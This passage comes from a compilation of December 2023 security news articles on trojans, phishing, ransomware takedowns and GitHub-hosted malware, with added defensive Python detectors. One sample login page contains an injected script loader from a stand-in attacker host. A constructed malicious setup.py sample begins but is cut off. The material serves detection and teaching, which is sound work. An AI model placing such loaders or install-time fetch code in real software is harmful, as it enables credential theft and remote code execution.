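    return {"unexpected": unexpected, "external": len(p.external), "inline": p.inline}


def csp_header(allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Build the CSP that makes the browser refuse scripts from other origins."""
    hosts = " ".join(sorted("https://" + h for h in allowed_hosts))
    return f"Content-Security-Policy: script-src 'self' {hosts}; object-src 'none'"


# Constructed login page: one legitimate script, one injected loader, one
# inline block and one same-origin script.
SAMPLE_LOGIN_PAGE = """<html><head>
<script src="https://static.bank.example/login.js"></script>
<script src="https://jscdnpack[.]com/loader.js"></script>
<script>window.__cfg = {};</script>
</head><body>
<form id="login"><input name="user"><input name="pass" type="password"></form>
<script src="/js/otp.js"></script>
</body></html>"""

if __name__ == "__main__":
    print(audit_scripts(SAMPLE_LOGIN_PAGE))
    print(csp_header())
```

Two caveats belong with this check. A CSP and a server-side script allowlist stop injection that happens between the origin and the browser, but a man-in-the-browser implant of the kind described here rewrites the page after it has been delivered and can ignore or strip the header, so the allowlist is a monitoring aid (run it against what a synthetic client actually receives) that complements endpoint controls and transaction-side anomaly detection, such as treating a sudden rash of users who stop logging in after an "unavailable for 12 hours" banner as a signal. Inline blocks are counted rather than judged because the parser cannot tell a legitimate config stub from an injected one; a nonce- or hash-based `script-src` is the way to pin those down.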

While the exact origins of the malware are presently not known, the indicators of compromise (IoCs) suggest a possible connection to a known stealer and loader family known as DanaBot, which has been propagated via malicious ads on Google Search and has acted as an initial access vector for ransomware.


"This sophisticated threat showcases advanced capabilities, particularly in executing man-in-the-browser attacks with its dynamic communication, web injection methods and the ability to adapt based on server instructions and current page state," Langus said.

The development comes as Sophos shed more light on a pig butchering scheme in which potential targets are lured into investing in a fake liquidity mining service, uncovering a broader set of scams that has netted the actors nearly $2.9 million worth of cryptocurrency this year as of November 15 from 90 victims.

"They appear to have been run by three separate threat activity groups using identical fraudulent decentralized finance ('DeFi') app sites, suggesting that they are part of or affiliated with a single [Chinese] organized crime ring," security researcher Sean Gallagher said.

According to data shared by Europol in its Internet Organized Crime Threat Assessment (IOCTA) earlier this week, investment fraud and business email compromise (BEC) fraud remain the most prolific online fraud schemes.

"A concerning threat around investment fraud is its use in combination with other fraud schemes against the same victims," the agency said.

"Investment fraud is sometimes linked to romance scams: criminals slowly build a relationship of trust with the victim and then convince them to invest their savings on fraudulent cryptocurrency trading platforms, leading to large financial losses."

On a related note, cybersecurity company Group-IB said it identified 1,539 phishing websites impersonating postal operators and delivery companies since the start of November 2023. They are suspected to be created for a single scam campaign.

In these attacks, users are sent SMS messages that mimic well-known postal services and are prompted to visit the counterfeit websites to enter their personal and payment details, citing urgent or failed deliveries.

The operation is also notable for incorporating various evasion methods to fly under the radar. This includes limiting access to the scam websites based on geographic locations, making sure that they work only on specific devices and operating systems, and shortening the duration for which they are live.

"The campaign affects postal brands in 53 countries," Group-IB said. "Most of the detected phishing pages target users in Germany (17.5%), Poland (13.7%), Spain (12.5%), U.K. (4.2%), Turkey (3.4%) and Singapore (3.1%)."


German Authorities Dismantle Dark Web Hub 'Kingdom Market' in Global Operation
23.12.23  BigBrothers  The Hacker News

German law enforcement has announced the disruption of a dark web platform called Kingdom Market that specialized in the sales of narcotics and malware to "tens of thousands of users."

The exercise, which involved collaboration from authorities from the U.S., Switzerland, Moldova, and Ukraine, began on December 16, 2023, the Federal Criminal Police Office (BKA) said.

Kingdom Market is said to have been accessible over the TOR and Invisible Internet Project (I2P) anonymization networks since at least March 2021, trafficking in illegal narcotics as well as advertising malware, criminal services, and forged documents.

As many as 42,000 products have been sold via several hundred seller accounts on the English language platform prior to its takedown, with 3,600 of them originating from Germany.

Transactions on the Kingdom Market were facilitated through cryptocurrency payments in the form of Bitcoin, Litecoin, Monero, and Zcash, with the website operators receiving a 3% commission for processing the sales of the illicit goods.

"The operators of 'Kingdom Market' are suspected of commercially operating a criminal trading platform on the Internet and of illicit trafficking in narcotics," the BKA said, adding an investigation into the seized server infrastructure is ongoing.

In addition to the seizure, one person connected to the running of Kingdom Market has been charged in the U.S. with identity theft and money laundering. Alan Bill, who also goes by the aliases Vend0r and KingdomOfficial, has been described as a Slovakian national.

The development comes days after another coordinated law enforcement effort saw the dismantling of the BlackCat ransomware's dark web infrastructure, prompting the group to respond to the seizure of its data leak site by wresting control of the page, claiming they had "unseized" it.


Hackers Exploiting MS Excel Vulnerability to Spread Agent Tesla Malware
23.12.23  Exploit  The Hacker News

Attackers are weaponizing an old Microsoft Office vulnerability as part of phishing campaigns to distribute a strain of malware called Agent Tesla.

The infection chains leverage decoy Excel documents attached in invoice-themed messages to trick potential targets into opening them and activate the exploitation of CVE-2017-11882 (CVSS score: 7.8), a memory corruption vulnerability in Office's Equation Editor that could result in code execution with the privileges of the user.

The findings, which come from Zscaler ThreatLabz, build on prior reports from Fortinet FortiGuard Labs, which detailed a similar phishing campaign that exploited the security flaw to deliver the malware.

"Once a user downloads a malicious attachment and opens it, if their version of Microsoft Excel is vulnerable, the Excel file initiates communication with a malicious destination and proceeds to download additional files without requiring any further user interaction," security researcher Kaivalya Khursale said.

The first payload is an obfuscated Visual Basic Script, which initiates the download of a malicious JPG file that comes embedded with a Base64-encoded DLL file. This steganographic evasion tactic was previously also detailed by McAfee Labs in September 2023.

The concealed DLL is subsequently injected into RegAsm.exe, the Windows Assembly Registration Tool, to launch the final payload. It's worth noting that the executable has also been abused to load Quasar RAT in the past.

Agent Tesla is a .NET-based advanced keylogger and remote access trojan (RAT) that's equipped to harvest sensitive information from compromised hosts. The malware then communicates with a remote server to extract the collected data.

"Threat actors constantly adapt infection methods, making it imperative for organizations to stay updated on evolving cyber threats to safeguard their digital landscape," Khursale said.

The development comes as old security flaws become new attack targets for threat actors. Earlier this week, Imperva revealed that a three-year-old flaw in Oracle WebLogic Server (CVE-2020-14883, CVSS score: 7.2) is being utilized by the 8220 Gang to deliver cryptocurrency miners.

It also coincides with an uptick in DarkGate malware activity after it began to be advertised earlier this year as a malware-as-a-service (MaaS) offering and as a replacement for QakBot following its takedown back in August 2023.

"The technology sector is the most impacted by DarkGate attack campaigns," Zscaler said, citing customer telemetry data.

"Most DarkGate domains are 50 to 60 days old, which may indicate a deliberate approach where threat actors create and rotate domains at specific intervals."

Phishing campaigns have also been discovered targeting the hospitality sector with booking-related email messages to distribute information stealer malware such as RedLine Stealer or Vidar Stealer, according to Sophos.

"They initially contact the target over email that contains nothing but text, but with subject matter a service-oriented business (like a hotel) would want to respond to quickly," researchers Andrew Brandt and Sean Gallagher said.


"Only after the target responds to the threat actor's initial email does the threat actor send a followup message linking to what they claim is details about their request or complaint."

Stealers and trojans notwithstanding, phishing attacks have further taken the form of bogus Instagram "Copyright Infringement" emails to steal users' two-factor authentication (2FA) backup codes via fraudulent web pages with an aim to bypass account protections, a scheme called Insta-Phish-A-Gram.

"The data attackers retrieve from this kind of phishing attack can be sold underground or used to take over the account," the cybersecurity firm said.


Urgent: New Chrome Zero-Day Vulnerability Exploited in the Wild - Update ASAP
21.12.23  Vulnerability  The Hacker News

Google has rolled out security updates for the Chrome web browser to address a high-severity zero-day flaw that it said has been exploited in the wild.

The vulnerability, assigned the CVE identifier CVE-2023-7024, has been described as a heap-based buffer overflow bug in the WebRTC framework that could be exploited to result in program crashes or arbitrary code execution.

Clément Lecigne and Vlad Stolyarov of Google's Threat Analysis Group (TAG) have been credited with discovering and reporting the flaw.

No other details about the security defect have been released to prevent further abuse, with Google acknowledging that "an exploit for CVE-2023-7024 exists in the wild."

The development marks the resolution of the eighth actively exploited zero-day in Chrome since the start of the year -

CVE-2023-2033 (CVSS score: 8.8) - Type confusion in V8
CVE-2023-2136 (CVSS score: 9.6) - Integer overflow in Skia
CVE-2023-3079 (CVSS score: 8.8) - Type confusion in V8
CVE-2023-4762 (CVSS score: 8.8) - Type confusion in V8
CVE-2023-4863 (CVSS score: 8.8) - Heap buffer overflow in WebP
CVE-2023-5217 (CVSS score: 8.8) - Heap buffer overflow in vp8 encoding in libvpx
CVE-2023-6345 (CVSS score: 9.6) - Integer overflow in Skia

A total of 26,447 vulnerabilities have been disclosed so far in 2023, surpassing the previous year by over 1,500 CVEs, according to data compiled by Qualys, with 115 flaws exploited by threat actors and ransomware groups.

Remote code execution, security feature bypass, buffer manipulation, privilege escalation, and input validation and parsing flaws emerged as the top vulnerability types.

Users are recommended to upgrade to Chrome version 120.0.6099.129/130 for Windows and 120.0.6099.129 for macOS and Linux to mitigate potential threats.

Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.


Remote Encryption Attacks Surge: How One Vulnerable Device Can Spell Disaster
21.12.23  Attack  The Hacker News

Ransomware groups are increasingly switching to remote encryption in their attacks, marking a new escalation in tactics adopted by financially motivated actors to ensure the success of their campaigns.

"Companies can have thousands of computers connected to their network, and with remote ransomware, all it takes is one underprotected device to compromise the entire network," Mark Loman, vice president of threat research at Sophos, said.

"Attackers know this, so they hunt for that one 'weak spot' — and most companies have at least one. Remote encryption is going to stay a perennial problem for defenders."

Remote encryption (aka remote ransomware), as the name implies, occurs when a compromised endpoint is used to encrypt data on other devices on the same network.

In October 2023, Microsoft revealed that around 60% of ransomware attacks now involve malicious remote encryption in an effort to minimize their footprint, with more than 80% of all compromises originating from unmanaged devices.

"Ransomware families known to support remote encryption include Akira, ALPHV/BlackCat, BlackMatter, LockBit, and Royal, and it's a technique that's been around for some time – as far back as 2013, CryptoLocker was targeting network shares," Sophos said.

A significant advantage to this approach is that it renders process-based remediation measures ineffective: the encryption process runs only on the unmanaged device, so the managed machines never see a malicious process on their own host, only file reads, writes and renames arriving over the network share.
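The one place the activity does show up is the file server's own audit trail, because the unmanaged device still has to read, write and rename every file over the share (typically SMB). As an added example, not Sophos' or Microsoft's detection logic, here is a sliding-window rule in Python over a constructed file-share audit log: it flags a client that, within 60 seconds, writes to at least five distinct files and renames at least three of them to a new extension. The CSV schema, the client addresses, the share names and the thresholds are all assumptions made for the demo:

```python
from __future__ import annotations

import csv
import io
import os
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed file-share audit log (not real telemetry). One line per access a
# network client makes to a file on the server's shares; RENAME carries the new
# name in "target". 10.0.5.23 is an ordinary workstation, 10.0.9.77 plays the
# unmanaged device that is encrypting files over the share.
SAMPLE_LOG = """ts,client,share,path,op,target
2023-12-20T02:10:05,10.0.5.23,finance,Q4/budget.xlsx,WRITE,
2023-12-20T02:11:30,10.0.5.23,finance,Q4/draft.docx,RENAME,Q4/final.docx
2023-12-20T02:12:40,10.0.5.23,finance,Q4/forecast.xlsx,WRITE,
2023-12-20T02:14:00,10.0.9.77,finance,Q4/budget.xlsx,READ,
2023-12-20T02:14:01,10.0.9.77,finance,Q4/budget.xlsx,WRITE,
2023-12-20T02:14:01,10.0.9.77,finance,Q4/budget.xlsx,RENAME,Q4/budget.xlsx.locked
2023-12-20T02:14:04,10.0.9.77,finance,Q4/forecast.xlsx,READ,
2023-12-20T02:14:05,10.0.9.77,finance,Q4/forecast.xlsx,WRITE,
2023-12-20T02:14:05,10.0.9.77,finance,Q4/forecast.xlsx,RENAME,Q4/forecast.xlsx.locked
2023-12-20T02:14:09,10.0.9.77,finance,Q4/final.docx,READ,
2023-12-20T02:14:10,10.0.9.77,finance,Q4/final.docx,WRITE,
2023-12-20T02:14:10,10.0.9.77,finance,Q4/final.docx,RENAME,Q4/final.docx.locked
2023-12-20T02:14:15,10.0.9.77,hr,payroll/2023-11.csv,READ,
2023-12-20T02:14:16,10.0.9.77,hr,payroll/2023-11.csv,WRITE,
2023-12-20T02:14:16,10.0.9.77,hr,payroll/2023-11.csv,RENAME,payroll/2023-11.csv.locked
2023-12-20T02:14:20,10.0.9.77,hr,payroll/2023-12.csv,READ,
2023-12-20T02:14:21,10.0.9.77,hr,payroll/2023-12.csv,WRITE,
2023-12-20T02:14:21,10.0.9.77,hr,payroll/2023-12.csv,RENAME,payroll/2023-12.csv.locked
2023-12-20T02:14:25,10.0.9.77,hr,README.txt,WRITE,
2023-12-20T02:14:25,10.0.9.77,hr,README.txt,RENAME,README.txt.locked
"""

WINDOW = timedelta(seconds=60)   # burst length examined per client (assumed threshold)
MIN_DISTINCT_WRITES = 5          # distinct files written inside the window (assumed)
MIN_EXT_CHANGES = 3              # renames that change the extension inside the window (assumed)


@dataclass
class Event:
    ts: datetime
    client: str
    share: str
    path: str
    op: str
    target: str


def parse_log(text: str) -> list[Event]:
    """Parse the CSV audit log into Event records."""
    return [
        Event(datetime.fromisoformat(r["ts"]), r["client"], r["share"], r["path"], r["op"], r["target"])
        for r in csv.DictReader(io.StringIO(text))
    ]


def changes_extension(ev: Event) -> bool:
    """A RENAME whose new name carries a different extension (e.g. .xlsx -> .xlsx.locked)."""
    return ev.op == "RENAME" and os.path.splitext(ev.target)[1] != os.path.splitext(ev.path)[1]


def detect_remote_encryption(events: list[Event]) -> list[dict]:
    """Flag clients that, within WINDOW, write many distinct files and rename them to new
    extensions. One alert per client, raised at the first event where both thresholds cross."""
    by_client: dict[str, list[Event]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        by_client[ev.client].append(ev)

    alerts = []
    for client, evs in by_client.items():
        window: deque[Event] = deque()
        for ev in evs:
            window.append(ev)
            while ev.ts - window[0].ts > WINDOW:   # slide the window forward in time
                window.popleft()
            written = {(e.share, e.path) for e in window if e.op in ("WRITE", "RENAME")}
            ext_changes = sum(1 for e in window if changes_extension(e))
            if len(written) >= MIN_DISTINCT_WRITES and ext_changes >= MIN_EXT_CHANGES:
                alerts.append({
                    "client": client,
                    "first_ts": window[0].ts.isoformat(),
                    "last_ts": ev.ts.isoformat(),
                    "shares": sorted({s for s, _ in written}),
                    "files": sorted(p for _, p in written),
                    "ext_changes": ext_changes,
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_remote_encryption(parse_log(SAMPLE_LOG)):
        print(f"{alert['client']} wrote {len(alert['files'])} files across {alert['shares']} "
              f"and changed {alert['ext_changes']} extensions "
              f"between {alert['first_ts']} and {alert['last_ts']}")
```

The rule keys on what the server can observe (who touched which files, how fast, and whether names changed) rather than on any process, which is the whole point when the process lives on a device nothing is watching. The benign rename of draft.docx to final.docx does not count because the extension stays the same; tune the window and counts to the share's normal write rate before alerting on it.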

The development comes amid broader shifts in the ransomware landscape, with the threat actors adopting atypical programming languages, targeting beyond Windows systems, auctioning stolen data, and launching attacks after business hours and at weekends to thwart detection and incident response efforts.


Sophos, in a report published last week, highlighted the "symbiotic – but often uneasy – relationship" between ransomware gangs and the media, as a way to not only attract attention, but also to control the narrative and dispute what they view as inaccurate coverage.

This also extends to publishing FAQs and press releases on their data leak sites, even including direct quotes from the operators, and correcting mistakes made by journalists. Another tactic is the use of catchy names and slick graphics, indicating an evolution of the professionalization of cyber crime.

"The RansomHouse group, for example, has a message on its leak site specifically aimed at journalists, in which it offers to share information on a 'PR Telegram channel' before it is officially published," Sophos noted.

While ransomware groups like Conti and Pysa are known for adopting an organizational hierarchy comprising senior executives, system admins, developers, recruiters, HR, and legal teams, there is evidence to suggest that some have advertised opportunities for English writers and speakers on criminal forums.

"Media engagement provides ransomware gangs with both tactical and strategic advantages; it allows them to apply pressure to their victims, while also enabling them to shape the narrative, inflate their own notoriety and egos, and further 'mythologize' themselves," the company said.


Alert: Chinese-Speaking Hackers Pose as UAE Authority in Latest Smishing Wave
21.12.23  Attack  The Hacker News

The Chinese-speaking threat actors behind Smishing Triad have been observed masquerading as the United Arab Emirates Federal Authority for Identity and Citizenship to send malicious SMS messages with the ultimate goal of gathering sensitive information from residents and foreigners in the country.

"These criminals send malicious links to their victims' mobile devices through SMS or iMessage and use URL-shortening services like Bit.ly to randomize the links they send," Resecurity said in a report published this week. "This helps them protect the fake website's domain and hosting location."

Smishing Triad was first documented by the cybersecurity company in September 2023, highlighting the group's use of compromised Apple iCloud accounts to send smishing messages for carrying out identity theft and financial fraud.

The threat actor is also known to offer ready-to-use smishing kits for sale to other cybercriminals for $200 a month, alongside engaging in Magecart-style attacks on e-commerce platforms to inject malicious code and pilfer customer data.

"This fraud-as-a-service (FaaS) model enables 'Smishing Triad' to scale their operations by empowering other cybercriminals to leverage their tooling and launch independent attacks," Resecurity noted.

The latest attack wave sends harmful messages to individuals who have recently updated their residence visas. The smishing campaign applies to both Android and iOS devices, with the operators likely using SMS spoofing or spam services to perpetrate the scheme.

Recipients who click on the embedded link in the message are taken to a bogus, lookalike website ("rpjpapc[.]top") impersonating the UAE Federal Authority for Identity, Citizenship, Customs and Port Security (ICP), which prompts them to enter their personal information such as names, passport numbers, mobile numbers, addresses, and card information.


What makes the campaign noteworthy is the use of a geofencing mechanism to load the phishing form only when visited from UAE-based IP addresses and mobile devices.

"The perpetrators of this act may have access to a private channel where they obtained information about UAE residents and foreigners living in or visiting the country," Resecurity said.

"This could be achieved through third-party data breaches, business email compromises, databases purchased on the dark web, or other sources."

Smishing Triad's latest campaign coincides with the launch of a new underground market known as OLVX Marketplace ("olvx[.]cc") that operates on the clear web and claims to sell tools to carry out online fraud, such as phish kits, web shells, and compromised credentials.

"While the OLVX marketplace offers thousands of individual products across numerous categories, its site administrators maintain relationships with various cybercriminals who create custom toolkits and can obtain specialized files, thereby furthering OLVX's ability to maintain and attract customers to the platform," ZeroFox said.

Cyber Criminals Misuse Predator Bot Detection Tool for Phishing Attacks
The disclosure comes as Trellix revealed how threat actors are leveraging Predator, an open-source tool designed to combat fraud and identify requests originating from automated systems, bots, or web crawlers, as part of various phishing campaigns.

The starting point of the attack is a phishing email sent from a previously compromised account and containing a malicious link, which, when clicked, checks if the incoming request is coming from a bot or a crawler, before redirecting to the phishing page.

The cybersecurity firm said it identified various artifacts where the threat actors repurposed the original tool by providing a list of hard-coded links as opposed to generating random links dynamically upon detecting a visitor is a bot.

"Cyber criminals are always looking for new ways to evade detection from organizations' security products," security researchers Vihar Shah and Rohan Shah said. "Open-source tools such as these make their task easier, as they can readily use these tools to avoid detection and more easily achieve their malicious goals."


3,500 Arrested in Global Operation HAECHI-IV Targeting Financial Criminals
21.12.23  Crime  The Hacker News

A six-month-long international police operation codenamed HAECHI-IV has resulted in the arrests of nearly 3,500 individuals and seizures worth $300 million across 34 countries.

The exercise, which took place from July through December 2023, took aim at various types of financial crimes such as voice phishing, romance scams, online sextortion, investment fraud, money laundering associated with illegal online gambling, business email compromise fraud, and e-commerce fraud.

In addition, authorities froze associated bank and virtual asset service provider (VASP) accounts in an effort to shut off access to criminal proceeds. In total, authorities blocked 82,112 suspicious bank accounts, confiscating $199 million in hard currency and $101 million in virtual assets.

"Cooperation between Filipino and Korean authorities led to the arrest in Manila of a high-profile online gambling criminal after a two-year manhunt by Korea's National Police Agency," Interpol, an international police organization, said.

Investment fraud, business email compromise, and e-commerce fraud accounted for 75% of the cases, the agency added, stating it detected a new scam in South Korea that involved the sale of non-fungible tokens (NFTs) with promises of huge returns, only for the operators to stage a rug pull and abruptly abandon the project.

Another novel trend concerned the use of artificial intelligence (AI) and deepfake technology to elevate the authenticity of scams, enabling criminals to impersonate people known to the targets, as well as deceive, defraud, harass, and extort victims through impersonation scams, online sexual blackmail, and investment fraud.

HAECHI-IV comes more than a year after HAECHI-III, which led to the seizure of $130 million worth of virtual assets in connection with a global crackdown on cyber-enabled financial crimes and money laundering.

"The seizure of $300 million represents a staggering sum and clearly illustrates the incentive behind today's explosive growth of transnational organized crime," Interpol's Stephen Kavanagh said. "This vast accumulation of unlawful wealth is a serious threat to global security and weakens the economic stability of nations worldwide."


New Go-Based JaskaGO Malware Targeting Windows and macOS Systems
21.12.23  Virus  The Hacker News

A new Go-based information stealer malware called JaskaGO has emerged as the latest cross-platform threat to infiltrate both Windows and Apple macOS systems.

AT&T Alien Labs, which made the discovery, said the malware is "equipped with an extensive array of commands from its command-and-control (C&C) server."

Artifacts designed for macOS were first observed in July 2023, impersonating installers for legitimate software such as CapCut. Other variants of the malware have masqueraded as AnyConnect and security tools.

Upon installation, JaskaGO runs checks to determine if it is executing within a virtual machine (VM) environment, and if so, executes a harmless task like pinging Google or printing a random number in a likely effort to fly under the radar.

In other scenarios, JaskaGO proceeds to harvest information from the victim system and establishes a connection to its C&C for receiving further instructions, including executing shell commands, enumerating running processes, and downloading additional payloads.

It's also capable of modifying the clipboard to facilitate cryptocurrency theft by substituting wallet addresses and siphoning files and data from web browsers.

"On macOS, JaskaGO employs a multi-step process to establish persistence within the system," security researcher Ofer Caspi said, outlining its capabilities to run itself with root permissions, disable Gatekeeper protections, and create a custom launch daemon (or launch agent) to ensure it's automatically launched during system startup.

It's currently not known how the malware is distributed and if it entails phishing or malvertising lures. The scale of the campaign remains unclear as yet.

"JaskaGO contributes to a growing trend in malware development leveraging the Go programming language," Caspi said.

"Go, also known as Golang, is recognized for its simplicity, efficiency, and cross-platform capabilities. Its ease of use has made it an attractive choice for malware authors seeking to create versatile and sophisticated threats."


FBI Takes Down BlackCat Ransomware, Releases Free Decryption Tool
21.12.23  Ransom  The Hacker News


The U.S. Justice Department (DoJ) has officially announced the disruption of the BlackCat ransomware operation and released a decryption tool that more than 500 affected victims can use to regain access to files locked by the malware.

Court documents show that the U.S. Federal Bureau of Investigation (FBI) enlisted the help of a confidential human source (CHS) to act as an affiliate for the BlackCat group and gain access to a web panel used for managing the gang's victims, in what's a case of hacking the hackers.

The confiscation effort involved collaboration and assistance from multiple law enforcement agencies from the U.S., Germany, Denmark, Australia, the U.K., Spain, Switzerland, and Austria.

BlackCat, also called ALPHV, GOLD BLAZER, and Noberus, first emerged in December 2021 and has since gone on to be the second most prolific ransomware-as-a-service variant in the world after LockBit. It's also the first Rust-language-based ransomware strain spotted in the wild.

The development puts an end to speculations of a rumored law enforcement action after its dark web leak portal went offline on December 7, only to resurface five days later with just a single victim.

The FBI said it worked with dozens of victims in the U.S. to implement the decryptor, saving them from ransom demands totaling about $68 million, and that it also gained insight into the ransomware's computer network, allowing it to collect 946 public/private key pairs used to host the TOR sites operated by the group and dismantle them.

One important thing to note here is that a hidden service on the TOR anonymization network is identified by a key pair: the .onion address is derived from the service's public key, and the matching private key is what signs the service descriptor telling the Tor network where the service can be reached.

An actor who is in possession of that private key can, therefore, publish a new descriptor pointing the same .onion address to a different server under their control, which is what lets whoever holds the keys put their own page at the address.

BlackCat, like several other ransomware gangs, uses a ransomware-as-a-service model involving a mix of core developers and affiliates, who rent out the payload and are responsible for identifying and attacking high-value victim institutions.

It also employs the double extortion scheme to put pressure on victims to pay up by exfiltrating sensitive data prior to encryption.

"BlackCat affiliates have gained initial access to victim networks through a number of methods, including leveraging compromised user credentials to gain initial access to the victim system," the DoJ said.

In all, the financially motivated actor is estimated to have compromised the networks of more than 1,000 victims across the world to earn nearly $300 million in illegal revenues as of September 2023.


Image Source: Resecurity
If anything, the takedown has proven to be a blessing in disguise for rival groups like LockBit, which is already capitalizing on the situation by actively recruiting displaced affiliates, offering its data leak site to resume victim negotiations.

Speaking to malware research group vx-underground, a BlackCat spokesperson said "they have moved their servers and blogs," claiming that the law enforcement agencies only had access to a "stupid old key" for the old blog site which was deleted by the group a long time ago and has since not been used.

The threat actor's newest leak website remains operational as of writing. "On December 13, the group published the first victim to its new leak site," Secureworks said. "As of December 19, five victims were posted to the new site, demonstrating the group retained some operational capacity."

However, hours after the takedown, the BlackCat group took steps to "unseize" the main leak site using the same set of cryptographic keys necessary to host the hidden service on the TOR network and post its own seizure notice.

It has also given affiliates the green light to infiltrate critical infrastructure entities such as hospitals and nuclear power plants as well as other targets with the exception of those inside the Commonwealth of Independent States (CIS) as a retaliatory measure. The FBI has since re-seized the website.

"The threats seem like 'now you've done it' posturing but, this group has a documented history of attacking healthcare and energy infrastructure targets already, so it feels like bluster," Secureworks Counter Threat Unit (CTU) told The Hacker News.

"Given that such activity appears more likely to bring law enforcement attention – which is why many groups explicitly avoid it – it seems unlikely that affiliates will choose to specifically target such organizations, especially as ransomware is a crime of opportunity for the most part and based on available access to victim networks."

"That said, some less risk averse affiliates may be more willing to target energy and healthcare organizations. The flip side is that it is just as likely that the uncertainty caused by the law enforcement disruption will drive affiliates away from BlackCat into the arms of other ransomware operators, such as LockBit. Such interventions breed distrust and paranoia among ransomware group members and affiliates."

In a conversation with vx-underground, a LockBit administrator described the situation as "unfortunate" and that security loopholes in their infrastructure are a primary threat to "my business."


Behind the Scenes of Matveev's Ransomware Empire: Tactics and Team
19.12.23  Ransom  The Hacker News

Cybersecurity researchers have shed light on the inner workings of the ransomware operation led by Mikhail Pavlovich Matveev, a Russian national who was indicted by the U.S. government earlier this year for his alleged role in launching thousands of attacks across the world.

Matveev, who resides in Saint Petersburg and is known by the aliases Wazawaka, m1x, Boriselcin, Uhodiransomwar, Orange, and waza, is alleged to have played a crucial part in the development and deployment of LockBit, Babuk, and Hive ransomware variants since at least June 2020.

"Wazawaka and his team members prominently exhibit an insatiable greed for ransom payments, demonstrating a significant disregard for ethical values in their cyber operations," Swiss cybersecurity firm PRODAFT said in a comprehensive analysis shared with The Hacker News.

"Employing tactics that involve intimidation through threats to leak sensitive files, engaging in dishonest practices, and persisting in retaining files even after the victim complies with the ransom payment, they exemplify the ethical void prevalent in the practices of traditional ransomware groups."

PRODAFT's findings are the result of data compiled between April and December 2023 by intercepting thousands of communication logs between various threat actors affiliated with various ransomware variants.

Matveev is said to lead a team of six penetration testers – 777, bobr.kurwa, krbtgt, shokoladniy_zayac, WhyNot, and dushnila – to execute the attacks. The group has a flat hierarchy, fostering better collaboration between the members.


"Each individual contributes resources and expertise as needed, showcasing a remarkable level of flexibility in adapting to new scenarios and situations," PRODAFT said.

Matveev, besides working as an affiliate for Conti, LockBit, Hive, Monti, Trigona, and NoEscape, also had a management-level role with the Babuk ransomware group up until early 2022, while sharing what's being described as a "complex relationship" with another actor named Dudka, who is likely the developer behind Babuk and Monti.


Attacks mounted by Matveev and his team involve the use of Zoominfo and services like Censys, Shodan, and FOFA to gather information about the victims, relying on known security flaws and initial access brokers for obtaining a foothold, in addition to using a mix of custom and off-the-shelf tools to brute-force VPN accounts, escalate privileges, and streamline their campaigns.

"Following the attainment of initial access, Wazawaka and his team primarily employ PowerShell commands to execute their preferred Remote Monitoring and Management (RMM) tool," the company said. "Distinctively, MeshCentral stands out as the team's unique toolkit, frequently utilized as their preferred open-source software for various operations."

PRODAFT's analysis further uncovered connections between Matveev and Evgeniy Mikhailovich Bogachev, a Russian national linked to the development of the GameOver Zeus botnet, which was dismantled in 2014, and Evil Corp.

It's worth noting that the Babuk ransomware operations rebranded as PayloadBIN in 2021, with the latter tied to Evil Corp in an apparent effort to get around sanctions imposed against it by the U.S. in December 2019.

"This technical association, coupled with the known relationship between Wazawaka and the notorious cybercriminal Bogachev, suggests deeper connections among Wazawaka, Bogachev, and the operations of Evil Corp," PRODAFT said.


Hackers Abusing GitHub to Evade Detection and Control Compromised Hosts
19.12.23  Security  The Hacker News


Threat actors are increasingly making use of GitHub for malicious purposes through novel methods, including abusing secret Gists and issuing malicious commands via git commit messages.

"Malware authors occasionally place their samples in services like Dropbox, Google Drive, OneDrive, and Discord to host second stage malware and sidestep detection tools," ReversingLabs researcher Karlo Zanki said in a report shared with The Hacker News.

"But lately, we have observed the increasing use of the GitHub open-source development platform for hosting malware."

Legitimate public services are known to be used by threat actors for hosting malware and acting as dead drop resolvers to fetch the actual command-and-control (C2) address.

This technique is sneaky as it allows threat actors to blend their malicious network traffic with genuine communications within a compromised network, making it challenging to detect and respond to threats in an effective manner. As a result, an infected endpoint communicating with a GitHub repository is less likely to be flagged as suspicious.

The abuse of GitHub gists points to an evolution of this trend. Gists, which are themselves Git repositories, offer an easy way for developers to share code snippets with others.

It's worth noting at this stage that public gists show up in GitHub's Discover feed, while secret gists, although not accessible via Discover, can be shared with others by passing along their URL.

"However, if someone you don't know discovers the URL, they'll also be able to see your gist," GitHub notes in its documentation. "If you need to keep your code away from prying eyes, you may want to create a private repository instead."

Another interesting aspect of secret gists is that they are not displayed in the GitHub profile page of the author, enabling threat actors to leverage them as some sort of a pastebin service.

ReversingLabs said it identified several PyPI packages – namely, httprequesthub, pyhttpproxifier, libsock, libproxy, and libsocks5 – that masqueraded as libraries for handling network proxying, but contained a Base64-encoded URL pointing to a secret gist hosted in a throwaway GitHub account without any public-facing projects.

The gist, for its part, features Base64-encoded commands that are parsed and executed in a new process through malicious code present in the setup.py file of the counterfeit packages.

The use of secret gists to deliver malicious commands to compromised hosts was previously highlighted by Trend Micro in 2019 as part of a campaign distributing a backdoor called SLUB (short for SLack and githUB).

A second technique observed by the software supply chain security firm entails the exploitation of version control system features, relying on git commit messages to extract commands for execution on the system.

The PyPI package, named easyhttprequest, incorporates malicious code that "clones a specific git repository from GitHub and checks if the 'head' commit of this repository contains a commit message that starts with a specific string," Zanki said.

"If it does, it strips that magic string and decodes the rest of the Base64-encoded commit message, executing it as a Python command in a new process." The GitHub repository that gets cloned is a fork of a seemingly legitimate PySocks project, and it does not have any malicious git commit messages.
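The two delivery tricks described above (a Base64-encoded gist URL hidden in setup.py, and a Base64 payload behind a magic prefix in a HEAD commit message) can be looked for with a small triage script. The following is an added example and not code from the malicious packages or from ReversingLabs; the gist account, gist id, magic prefix ("##cmd##") and commit messages are all constructed, since the real magic string is not given above. It decodes candidate literals strictly and never executes what it finds.

```python
import base64
import binascii
import re

# Added example, not code from the packages or from ReversingLabs. Everything
# below is constructed: the gist account, gist id and magic prefix are made up.
GIST_URL = "https://gist.github.com/exampleuser/0123456789abcdef"  # made-up
MAGIC = "##cmd##"  # hypothetical magic prefix; the real one is not on the page

# A setup.py fragment in the shape described above: the gist URL is present
# only as a Base64 literal that the package decodes and fetches at install time.
SAMPLE_SETUP_PY = (
    "from setuptools import setup\n"
    "import base64, urllib.request, subprocess\n"
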